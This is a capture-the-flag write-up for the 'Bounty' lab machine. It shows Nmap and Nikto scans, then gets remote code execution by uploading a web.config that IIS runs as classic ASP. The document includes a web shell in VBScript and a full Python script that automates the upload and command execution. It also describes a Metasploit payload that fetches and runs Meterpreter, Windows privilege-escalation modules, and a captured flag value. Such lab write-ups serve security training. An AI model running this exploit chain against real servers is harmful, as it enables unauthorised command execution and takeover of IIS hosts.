```
Nmap scan report for 10.10.10.93
Host is up (0.051s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
```
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.93
+ Target Hostname:    10.10.10.93
+ Target Port:        80
+ Start Time:         2018-06-17 16:06:26 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7502 requests: 2 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-06-17 16:14:32 (GMT2) (486 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
```
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Requested Range Not Satisfiable</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Requested Range Not Satisfiable</h2>
<hr><p>HTTP Error 416. The requested range is not satisfiable.</p>
</BODY></HTML>
* Connection #0 to host 10.10.10.93 left intact
```
The DoS exploit itself, however, does not work here because the requested image is smaller than 256 KB.
transfer.aspx is the only accessible page and contains an upload form.
We first have to guess which kind of file the form accepts.
The form validates the uploaded file only by its extension and stores it under /uploadedfiles/ (IIS paths are case insensitive) with the same name and extension as the file we uploaded.
If the file is not a valid PNG we get: The image "http://10.10.10.93/uploadedfiles/text.png" cannot be displayed because it contains errors.
From burp we got: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8.
This returns 3 if the upload worked and the file is executed server-side. The next step is to run shell commands from the ASP code through the WScript.Shell COM object (Windows Script Host, not the .NET framework):
```vbscript
' Run a command through the WScript.Shell COM object and echo its stdout.
' The "-"&"->" / "<!-"&"-" writes close and reopen the HTML comment that
' wraps the ASP block inside the web.config, so the output renders visibly.
Set objShell = CreateObject("WScript.Shell")
command = "ipconfig"
Set objCmdExec = objShell.Exec("cmd /c " & command)
getCommandOutput = objCmdExec.StdOut.ReadAll
Response.Write("-"&"->")
Response.Write(getCommandOutput)
Response.Write("<!-"&"-")
```
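As an added example (not code from the original writeup), the following stdlib-only Python script automates the steps above: scrape the ASP.NET upload form, post a web.config that IIS will execute as classic ASP, and read the command output back from /uploadedfiles/web.config. The form field names (FileUpload1, btnUpload), the __VIEWSTATE value, SAMPLE_FORM_HTML and the run_via_web_config helper are assumptions; the handler and requestFiltering block follows the widely published web.config-as-ASP technique, which the writeup uses but does not reproduce.

```python
# Added example, not the writeup's own code. Field names, __VIEWSTATE value
# and SAMPLE_FORM_HTML are constructed assumptions about transfer.aspx.
import re
import uuid
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed stand-in for the HTML transfer.aspx might serve.
SAMPLE_FORM_HTML = """
<form method="post" action="./transfer.aspx" id="form1">
  <input type="hidden" name="__VIEWSTATE" value="dDwxMjM0NTY3ODk7Pg==" />
  <input type="hidden" name="__EVENTVALIDATION" value="ev123" />
  <input type="file" name="FileUpload1" id="FileUpload1" />
  <input type="submit" name="btnUpload" value="Upload" />
</form>
"""

# Remap *.config to asp.dll and lift the request-filtering rules that would
# otherwise hide web.config. The ASP sits inside an XML comment; "-"&"->" and
# "<!-"&"-" are split so no literal "-->" appears and breaks the XML.
WEB_CONFIG_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security><requestFiltering>
      <fileExtensions><remove fileExtension=".config" /></fileExtensions>
      <hiddenSegments><remove segment="web.config" /></hiddenSegments>
    </requestFiltering></security>
  </system.webServer>
</configuration>
<!--
<% Set objShell = CreateObject("WScript.Shell")
   Set objExec = objShell.Exec("cmd /c {cmd}")
   Response.Write("-"&"->")
   Response.Write(objExec.StdOut.ReadAll())
   Response.Write("<!-"&"-") %>
-->
"""


class FormScraper(HTMLParser):
    """Collect the form action, its hidden/text/submit fields (ASP.NET needs
    __VIEWSTATE & co. echoed back) and the name of the file input."""

    def __init__(self):
        super().__init__()
        self.action, self.fields, self.file_field = "", {}, None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.action = a.get("action") or ""
        elif tag == "input" and a.get("name"):
            kind = (a.get("type") or "text").lower()
            if kind == "file":
                self.file_field = a["name"]
            elif kind in ("hidden", "text", "submit"):
                self.fields[a["name"]] = a.get("value") or ""


def parse_upload_form(html):
    p = FormScraper()
    p.feed(html)
    return p.action, p.fields, p.file_field


def build_web_config(cmd):
    """Embed cmd in the VBScript string; a quote is escaped by doubling it."""
    return WEB_CONFIG_TEMPLATE.format(cmd=cmd.replace('"', '""'))


def build_multipart(fields, file_field, filename, content):
    """Hand-rolled multipart/form-data body, returned with its Content-Type."""
    boundary = "----Boundary" + uuid.uuid4().hex
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'.encode()
             for n, v in fields.items()]
    parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
                 f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n'
                 .encode() + content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts), f"multipart/form-data; boundary={boundary}"


def extract_output(page):
    """The ASP writes '-->' before and '<!--' after the command output, so that
    slice is the only uncommented text in the rendered web.config."""
    m = re.search(r"-->(.*?)<!--", page, re.S)
    return m.group(1) if m else page


def run_via_web_config(base_url, cmd):
    """Network path (assumed flow, not exercised offline): fetch the form, post
    web.config, then request /uploadedfiles/web.config so IIS runs the ASP."""
    form_url = urljoin(base_url, "transfer.aspx")
    with urllib.request.urlopen(form_url) as r:
        action, fields, file_field = parse_upload_form(r.read().decode("utf-8", "replace"))
    if file_field is None:
        raise RuntimeError("no file input on transfer.aspx")
    body, ctype = build_multipart(fields, file_field, "web.config",
                                  build_web_config(cmd).encode())
    req = urllib.request.Request(urljoin(form_url, action), data=body,
                                 headers={"Content-Type": ctype}, method="POST")
    urllib.request.urlopen(req).read()
    with urllib.request.urlopen(urljoin(base_url, "uploadedfiles/web.config")) as r:
        return extract_output(r.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    print(run_via_web_config("http://10.10.10.93/", "whoami"))
```

Because the page validates only the extension, the interesting decision is what IIS does with the file once it lands in /uploadedfiles/; the handler remap is what turns a harmless config file into executable ASP, and the quote-doubling in build_web_config is what keeps a command containing double quotes from breaking the VBScript string.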
The command runs successfully: we have RCE!
With wmic OS get OSArchitecture we got the architecture of the system (64-bit); with where /r c:\ *.txt we found the user flag at c:\Users\merlin\Desktop\user.txt, and type c:\Users\merlin\Desktop\user.txt gave us the first flag: e29ad89891462e0b09741e3082f44a2f.
For the root flag we need direct access to the machine, so with Metasploit we crafted a web-delivery payload that fetches and runs the Meterpreter executable:
After uploading this file and requesting it with curl http://10.10.10.93/uploadedfiles/web.config we got a session, and migrated to another process to avoid being kicked out.
Once we had the shell as user merlin we used the Metasploit module post/multi/recon/local_exploit_suggester to look for feasible exploits on the machine; we then tried exploit/windows/local/ms10_092_schelevator.